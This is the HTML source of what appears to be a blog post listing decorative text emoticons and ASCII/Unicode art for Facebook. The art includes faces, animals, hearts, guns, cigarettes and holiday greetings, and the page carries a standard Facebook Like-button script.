&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 2: &lt;/span&gt;&lt;/b&gt;ಥ_ಥ&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 3: &lt;/span&gt;&lt;/b&gt;¯\(°_o)/¯&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 4:&lt;/span&gt;&lt;/b&gt; ب_ب&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 5:&lt;/span&gt;&lt;/b&gt; ◕ ‿ ◕&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 6: &lt;/span&gt;&lt;/b&gt;m(&amp;gt;&amp;lt;)m&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 7: &lt;/span&gt;&lt;/b&gt;o(╥﹏╥)o&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 8: &lt;/span&gt;&lt;/b&gt;//(ㄒoㄒ)//&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 9: &lt;/span&gt;&lt;/b&gt;{{{(&amp;gt;_&amp;lt;)}}}&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 10: &lt;/span&gt;&lt;/b&gt;&amp;nbsp; ☼_☼ &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Face 10: &amp;nbsp;&lt;/span&gt;&lt;/b&gt; ( ( (d[-.-]b) ) ) &amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Princess Leia StarWars: &lt;/span&gt;&lt;/b&gt;@-_-@ .. @-.-@ .. @&amp;gt;.&amp;lt;@&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Love Eyes:&lt;/span&gt;&lt;/b&gt; &amp;nbsp;♥‿♥ &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Girls with flowers:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
✿◕‿◕✿ &amp;nbsp;❀◕‿◕❀ &amp;nbsp; &amp;nbsp;❁◕‿◕❁ &amp;nbsp; &amp;nbsp;✾◕‿◕✾&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;Thumb up (Like) = (y)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Butterfly:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Butterfly 01:&lt;/span&gt;&lt;/b&gt; εїз&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Butterfly facebook symbol:&lt;/span&gt;&lt;/b&gt; Ƹ̴Ӂ̴Ʒ&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Fish:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Fish to right:&lt;/span&gt;&lt;/b&gt; &amp;gt;&amp;lt;((((º&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Fish to left:&lt;/span&gt;&lt;/b&gt; &amp;lt;º))))&amp;gt;&amp;lt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Music:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Music Box: &lt;/span&gt;&lt;/b&gt;lıllı ((((|̲̅̅●̲̅̅|̲̅̅=̲̅̅|̲̅̅●̲̅̅|)))) ıllı&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Ipod:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
╔═══╗ ♪&lt;br /&gt;
║███║ ♫&lt;br /&gt;
║ (●) ♫&lt;br /&gt;
╚═══╝♪♪&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Men with banner:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
............(0 0)&lt;br /&gt;
.---oOO-- (_)-----.&lt;br /&gt;
╔═════════════════╗&lt;br /&gt;
║ Type your message here!..║&lt;br /&gt;
╚═════════════════╝&lt;br /&gt;
'----------------------oOO&lt;br /&gt;
........|__|__|&lt;br /&gt;
.......... || ||&lt;br /&gt;
....... ooO Ooo&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Decorate your signature&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
*´¨)&lt;br /&gt;
¸.•´¸.•*´¨) ¸.•*¨)&lt;br /&gt;
(¸.•´ (¸.•` ¤ Type your name here&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;Guns ascii art facebook symbols:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Shotgun 01: &lt;/span&gt;&lt;/b&gt;︻┳═一&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Shotgun 02:&lt;/span&gt;&lt;/b&gt; ︻╦̵̵͇̿̿̿̿╤──&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Gun Design 1&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
.....____________________ , ,__&lt;br /&gt;
....../ `---___________----_____] - - - - - - - - ░ ▒▓▓█D&lt;br /&gt;
...../_==o;;;;;;;;_______.:/&lt;br /&gt;
.....), ---.(_(__) /&lt;br /&gt;
....// (..) ), ----"&lt;br /&gt;
...//___//&lt;br /&gt;
..//___//&lt;br /&gt;
.//___//&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Gun Design 2&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
....._\____________________,,__&lt;br /&gt;
..../ `--│││││││││----------------------_]&lt;br /&gt;
.../_==o ____________________&lt;br /&gt;
.....),---.(_(__) /&lt;br /&gt;
....// (\) ),------&lt;br /&gt;
...//___//&lt;br /&gt;
../`----' / ...&lt;br /&gt;
./____ / ... .&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Kirby Dance:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;('o'&amp;lt;) ^( '-' )^ (&amp;gt;‘o’)&amp;gt; v( ‘.’ )v &amp;lt;(' .' )&amp;gt; &amp;lt;('.'&amp;lt;) ^( '.' )^ (&amp;gt;‘.’)&amp;gt; v( ‘.’ )v &amp;lt;(' .' )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Cigarettes made with facebook symbols:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Regular cigaritte:&lt;/span&gt;&lt;/b&gt; (̅_̅_̅(̅(̅_̅_̅_̅_̅_̅̅()ڪ&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Lucky strike cigaritte:&lt;/span&gt;&lt;/b&gt; (̅_̅_̅(̲̲̲̲̲̅̅̅̅̅̅(̅_̅_̲̲̲̅̅̅l̲̅u̲̅c̲̅k̲̅y̲̲̅̅̅_̅_ ̅_̅() ڪے&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Marlboro cigaritte &lt;/span&gt;&lt;/b&gt;(̅_̅_̅(̲̲̲̲̲̅̅̅̅̅̅(̅_̅_̲̅м̲̅a̲̅я̲̅l̲̅b̲̅o̲̅r̲̅o̲̅̅ _̅_̅_̅() ڪے&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Health cool shapes:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Injection: &lt;/span&gt;&lt;/b&gt;┣▇▇▇═─&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Electrocardiogram: &lt;/span&gt;&lt;/b&gt;√v^√v^√♥&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Band Aid: &lt;/span&gt;&lt;/b&gt;( ̲̅:̲̅:̲̅:̲̅[̲̅ ̲̅]̲̅:̲̅:̲̅:̲̅ )&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Rabbits and kittens made with facebook symbols:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(\_/)&lt;br /&gt;
(0.0)&lt;br /&gt;
(&amp;gt;&amp;lt;)&lt;br /&gt;
&lt;br /&gt;
( ) ( )&lt;br /&gt;
(* .*)&lt;br /&gt;
(”__”)&lt;br /&gt;
&lt;br /&gt;
::: (\_(\&lt;br /&gt;
*: (=’ :’) :*&lt;br /&gt;
•.. (,(”)(”)¤°.¸¸.•´¯`»&lt;br /&gt;
&lt;br /&gt;
(V)&lt;br /&gt;
(. .)&lt;br /&gt;
c(”)(”)&lt;br /&gt;
&lt;br /&gt;
(\_/)&lt;br /&gt;
(°.°)&lt;br /&gt;
c(”)(”)&lt;br /&gt;
&lt;br /&gt;
(\_/)&lt;br /&gt;
(°.°)&lt;br /&gt;
o( )o&lt;br /&gt;
O_O&lt;br /&gt;
&lt;br /&gt;
(\__/)&lt;br /&gt;
(&amp;gt;’.’&amp;lt;)&lt;br /&gt;
(")_(")&lt;br /&gt;
&lt;br /&gt;
(&amp;gt; " " &amp;lt;)&lt;br /&gt;
( ='o'= )&lt;br /&gt;
-(,,)-(,,)-&lt;br /&gt;
(&amp;gt; " " &amp;lt;) (&amp;gt; " " &amp;lt;)&lt;br /&gt;
( ='o'= ) ( ='o'= )&lt;br /&gt;
-(,,)-(,,)- (,,)-(,,)-...&lt;br /&gt;
(&amp;gt; " " &amp;lt;) (&amp;gt; " " &amp;lt;) (&amp;gt; " " &amp;lt;)&lt;br /&gt;
( ='o'= ) ( ='o'= ) ( ='o'= )&lt;br /&gt;
-(,,)-(,,)- -(,,)-(,,)--(,,)-(,,)-....&lt;br /&gt;
&lt;br /&gt;
•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•&lt;br /&gt;
::: (\_(\ ...*...*...*...*...*...*...*...*...*...*...*...*&lt;br /&gt;
*: (=' :') :::::::: Facebook Symbols :::::::::::&lt;br /&gt;
•.. (,('')('')¤...*...*...*...*...*...*...*...*...*...*...*&lt;br /&gt;
¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Love shapes ascii art facebook symbols - Valentine's day facebook symbols:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Bunch of flowers - Bouquet&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
....*☆.¸.☆*'&lt;br /&gt;
....*☆.@@ ☆*'&lt;br /&gt;
.*☆.@@@@☆*'&lt;br /&gt;
....@@@@@@&lt;br /&gt;
...☆*@@@@`*☆.¸¸&lt;br /&gt;
.......\\\||///.&lt;br /&gt;
........\\||//.&lt;br /&gt;
.........ƸӜƷ.&lt;br /&gt;
..........\|/..♥&lt;br /&gt;
...........V....&lt;br /&gt;
&lt;br /&gt;
&lt;div id="fb-root"&gt;&lt;/div&gt;&lt;script&gt;
(function(d){
  var js, id = 'facebook-jssdk'; if (d.getElementById(id)) {return;}
  js = d.createElement('script'); js.id = id; js.async = true;
  js.src = "//connect.facebook.net/en_US/all.js#appId=106068299500309&amp;xfbml=1";
  d.getElementsByTagName('head')[0].appendChild(js);
}(document));
&lt;/script&gt;&lt;br /&gt;
&lt;div class="fb-like" data-href="http://hackrich.blogspot.com/" data-send="true" data-show-faces="true" data-width="450"&gt;&lt;/div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• Lovers &amp;nbsp;facebook symbols:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
☻♥ ☻&lt;br /&gt;
/♥\./█\&lt;br /&gt;
.||. .||&lt;br /&gt;
&lt;br /&gt;
../(,")\♥ ♥(".)&lt;br /&gt;
.../♥\. = ./█\.&lt;br /&gt;
.._| |_ .._| |_ ★&lt;br /&gt;
&lt;br /&gt;
==============&lt;br /&gt;
..........(¯`v´¯)&lt;br /&gt;
...........`•.¸.•´&lt;br /&gt;
.........(●̮̮̃•̃)..(●̮̮̃•̃)&lt;br /&gt;
......... /█\ ♥/█\&lt;br /&gt;
==============&lt;br /&gt;
&lt;br /&gt;
[̲̅ə̲̅٨̲̅٥̲̅٦̲̅] |̲̅‹̲̅3̲̅]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Love Eyes:&lt;/span&gt;&lt;/b&gt; &amp;nbsp;♥‿♥ &amp;nbsp; &amp;nbsp; ✿♥‿♥✿ &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;• &amp;nbsp;I love you special font:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
╔♫═╗╔╗ ♥&lt;br /&gt;
╚╗╔╝║║♫═╦╦╦╔╗&lt;br /&gt;
╔╝╚╗♫╚╣║║║║╔╣&lt;br /&gt;
╚═♫╝╚═╩═╩♫╩═╝&lt;br /&gt;
ஜ۩۞۩ஜ YOU ஜ۩۞۩ஜ&lt;br /&gt;
&lt;br /&gt;
(¸¸.♥➷♥•*¨)¸.•´¸.•*¨) ¸.•*¨)&lt;br /&gt;
(¸.•´(¸. ¸.•´¸.•*¨) ¸.♥➷•*¨)&lt;br /&gt;
─▀██▀─▄███▄─▀██─██▀██▀▀▀█─&lt;br /&gt;
──██─███─███─██─██─██▄█──ｃｏｎｑｕｅｒｓ&lt;br /&gt;
──██─▀██▄██▀─▀█▄█▀─██▀█──ａｌｌ ♥➷♥&lt;br /&gt;
─▄██▄▄█▀▀▀─────▀──▄██▄▄▄█&lt;br /&gt;
¸.•´¸.•*¨) ¸♥.•*¨) (¸.•´¸♥➷♥¸.•´♥¸.•´♥¸.•*¨)♥.•*¨)¸.•*♥¸&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Money shapes for facebook:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
[̲̅$̲̅(̲̅2οο̲̅)̲̅$̲̅]&lt;br /&gt;
&lt;br /&gt;
[̲̅$̲̅(̲̅ιοο̲̅)̲̅$̲̅]&lt;br /&gt;
&lt;br /&gt;
[̲̅$̲̅(̲̅5̲̅)̲̅$̲̅]&lt;br /&gt;
&lt;br /&gt;
[̲̅$̲̅(̲̅1̲̅)̲̅$̲̅]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
|͇̿P͇̿ł͇̿α͇̿ч͇̿b͇̿о͇̿ч͇̿̿|&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Footsteps made with facebook symbols:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
----------Oooo---&lt;br /&gt;
-----------(----)---&lt;br /&gt;
------------)--/----&lt;br /&gt;
------------(_/-&lt;br /&gt;
----oooO----&lt;br /&gt;
----(---)----&lt;br /&gt;
-----\--(--&lt;br /&gt;
------\_)-&lt;br /&gt;
-----------Oooo---&lt;br /&gt;
-----------(----)---&lt;br /&gt;
------------)--/----&lt;br /&gt;
------------(_/-&lt;br /&gt;
----oooO----&lt;br /&gt;
----(---)----&lt;br /&gt;
-----\--(--&lt;br /&gt;
------\_)-&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• &amp;nbsp;Happy birthday:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
╔♫╗────────╔═╦╗─♫╗╔╗─╔╗─♥──&lt;br /&gt;
║╩╠═╦═╦═╦╦╗║╚╠╬╦╣╚╣╚╦╝╠═╦╦╗&lt;br /&gt;
║╦║╬║╬║╬║║║║╔║║╔╣╔╣║║╬║╬║║║&lt;br /&gt;
╚╩╩╩╣╔╣╔╬╗║♫═╩╩╝╚═╩╩╩═╩╩╬╗║&lt;br /&gt;
────♫╝╚╝╚═╝─────────────╚═♥&lt;br /&gt;
ஜ۩۞۩ஜ YOUR NAME HERE ஜ۩۞۩ஜ&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• &amp;nbsp;Tanks:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
███۞███████ ]▄▄▄▄▄▄▄▄▄▄▄▄▃&lt;br /&gt;
▂▄▅█████████▅▄▃▂&lt;br /&gt;
I███████████████████].&lt;br /&gt;
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤...&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;..../""""""""|======[]&lt;br /&gt;
..../""""""""""""|&lt;br /&gt;
/"""""""""""""""""""""""""\&lt;br /&gt;
\(@) (@) (@) (@) (@) (@)/&lt;br /&gt;
&lt;br /&gt;
......(\_/)&lt;br /&gt;
......( '_')&lt;br /&gt;
..../""""""""""""\======░ ▒▓▓█D&lt;br /&gt;
/"""""""""""""""""""\&lt;br /&gt;
\_@_@_@_@_@_/&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• &amp;nbsp;Bar code for facebook&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
║█║▌║█║▌│║▌█║▌║&lt;br /&gt;
01031989-50457&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;© Profile Original &amp;amp; Official®&lt;br /&gt;
█║▌│█│║▌║││█║▌║▌║&lt;br /&gt;
Verified Official by facebook&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• &amp;nbsp;Thumb Up facebook symbols&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
...../ )&lt;br /&gt;
.....' /&lt;br /&gt;
---' (_____&lt;br /&gt;
......... ((__)&lt;br /&gt;
..... _ ((___)&lt;br /&gt;
....... -'((__)&lt;br /&gt;
--.___((_)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
░░░░░░░░░░░░▄▄&lt;br /&gt;
░░░░░░░░░░░█░░█&lt;br /&gt;
░░░░░░░░░░░█░░█&lt;br /&gt;
░░░░░░░░░░█░░░█&lt;br /&gt;
░░░░░░░░░█░░░░█&lt;br /&gt;
███████▄▄█░░░░░██████▄&lt;br /&gt;
▓▓▓▓▓▓█░░░░░░░░░░░░░░█&lt;br /&gt;
▓▓▓▓▓▓█░░░░░░░░░░░░░░█&lt;br /&gt;
▓▓▓▓▓▓█░░░░░░░░░░░░░░█&lt;br /&gt;
▓▓▓▓▓▓█░░░░░░░░░░░░░░█&lt;br /&gt;
▓▓▓▓▓▓█░░░░░░░░░░░░░░█&lt;br /&gt;
▓▓▓▓▓▓█████░░░░░░░░░█&lt;br /&gt;
██████▀░░░░▀▀██████▀&lt;br /&gt;
&lt;br /&gt;
╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱&lt;br /&gt;
╱╱┏╮╱╱╱╱╱╱╱╱╱╱╱╱&lt;br /&gt;
╱╱┃┃╱╱╱┳╱┓┳╭┫┳┓╱&lt;br /&gt;
▉━╯┗━╮╱┃╱┃┣┻╮┣╱╱&lt;br /&gt;
▉┈┈┈┈┃╱┻┛┛┻╱┻┻┛╱&lt;br /&gt;
▉╮┈┈┈┃╱╱╱╱╱╱╱╱╱╱&lt;br /&gt;
╱╰━━━╯╱╱╱╱╱╱╱╱╱╱&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• Father's day facebook symbols&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
╔╗╔╗─────────────╔═╦═╦═╗&lt;br /&gt;
║║║╠═╦╦╦═╗╔╦╦═╦╦╗║║║╬║║║▄██▄██▄&lt;br /&gt;
║║║║╬║║║╩╣║║║╬║║║║║║║║║║▀█████▀&lt;br /&gt;
╚╝╚╩═╩═╩═╝╠╗╠═╩═╝╚═╩╩╩═╝──▀█▀&lt;br /&gt;
──────────╚═╝&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;• &amp;nbsp;Mother's day facebook symbols&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
╔══════════════════╗&lt;br /&gt;
║.(¯`♥´¯)´´¯`•°*”˜˜”*°•. ƸӜƷ&lt;br /&gt;
║.`*.¸.*.•°*”˜˜”*°•.ƸӜƷ&lt;br /&gt;
║.•°*”˜˜”*°•.ƸӜƷ ✶* ¸ .✫ ♥&lt;br /&gt;
║✿ нαppy мoтнer´ѕ dαy ✿&lt;br /&gt;
╚══════════════════╝&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;• More cool shapes made with facebook symbols here:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
_____________8__88_____8&lt;br /&gt;
____________88_8__8_____8&lt;br /&gt;
___________888_____88___88888&lt;br /&gt;
__________8888______88_8____88&lt;br /&gt;
_________8888_______88______8_8&lt;br /&gt;
_________8888_______88______8_8&lt;br /&gt;
_________8888_______8_______8&lt;br /&gt;
_________8888_____8_______8&lt;br /&gt;
__________88888____8______8&lt;br /&gt;
___________8888888______8&lt;br /&gt;
__888_________88888_8&lt;br /&gt;
8888888________88_____&lt;br /&gt;
_8888888_______8_____&lt;br /&gt;
__888888_______88_____&lt;br /&gt;
___88_____8_____8_____&lt;br /&gt;
____8______8____8_____8_88&lt;br /&gt;
_______8888_8__88_8_88888&lt;br /&gt;
_____888888_8_88__8888888&lt;br /&gt;
____8888888__88______88888&lt;br /&gt;
____88888_____8_________888&lt;br /&gt;
____88_________8__________8&lt;br /&gt;
_____8_________8_____&lt;br /&gt;
_______________8_____&lt;br /&gt;
____________8_8_____&lt;br /&gt;
_____________88_8_____&lt;br /&gt;
______________88_____&lt;br /&gt;
______________8_____&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: verdana; font-size: 11px; line-height: 16px;"&gt;_________$$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;
_________$$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;
___$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;
_$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;
$$$$______$$$$$$$$$$$$$$$$$$$$$$_______$$$$&lt;br /&gt;
$$$_______$$$$$$$$$$$$$$$$$$$$$$________$$$&lt;br /&gt;
$$________$$$$$$$$$$$$$$$$$$$$$$________$$$&lt;br /&gt;
$$$_____$$$$$$$$$$$$$$$$$$$$$$$$$$______$$$&lt;br /&gt;
$$$____$$$$$$$$$$$$$$$$$$$$$$$$$$$$____$$$$&lt;br /&gt;
_$$$___$$$_$$$$$$$$$$$$$$$$$$$$_$$$____$$$&lt;br /&gt;
_$$$$___$$$_$$$$$$$$$$$$$$$$$$_$$$$__$$$$&lt;br /&gt;
___$$$$__$$$$$$$$$$$$$$$$$$$$$$$$$_$$$$$&lt;br /&gt;
____$$$$$$$$_$$$$$$$$$$$$$$$$_$$$$$$$$$&lt;br /&gt;
______$$$$$$__$$$$$$$$$$$$$$___$$$$$$&lt;br /&gt;
_______________$$$$$$$$$$$$&lt;br /&gt;
_________________$$$$$$$$&lt;br /&gt;
___________________$$$$&lt;br /&gt;
___________________$$$$&lt;br /&gt;
___________________$$$$&lt;br /&gt;
___________________$$$$&lt;br /&gt;
_______________$$$$$$$$$$$$&lt;br /&gt;
____________$$$$$$$$$$$$$$$$$$&lt;br /&gt;
____________$$$$$$$$$$$$$$$$$$&lt;br /&gt;
____________$$$____________$$$&lt;br /&gt;
____________$$$____໓ค໓____$$$&lt;br /&gt;
____________$$$____________$$$&lt;br /&gt;
____________$$$$$$$$$$$$$$$$$$&lt;br /&gt;
____________$$$$$$$$$$$$$$$$$$&lt;br /&gt;
__________$$$$$$$$$$$$$$$$$$$$$$&lt;br /&gt;
_________$$$$$$$$$$$$$$$$$$$$$$$$&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: verdana; font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000; font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;b&gt;• Father's day facebook symbols text:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75; font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;&lt;b&gt;Happy father's day:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;нαρρу ƒαтнєя'ѕ ∂αу&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ɧąþþγ ∱ąŧɧεŗ'ş đąγ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;հձթթყ բձէհεг'ร ժձყ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px; line-height: 16px;"&gt;ʎɐp s,ɹǝ4ʇɐɟ ʎddɐӇ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
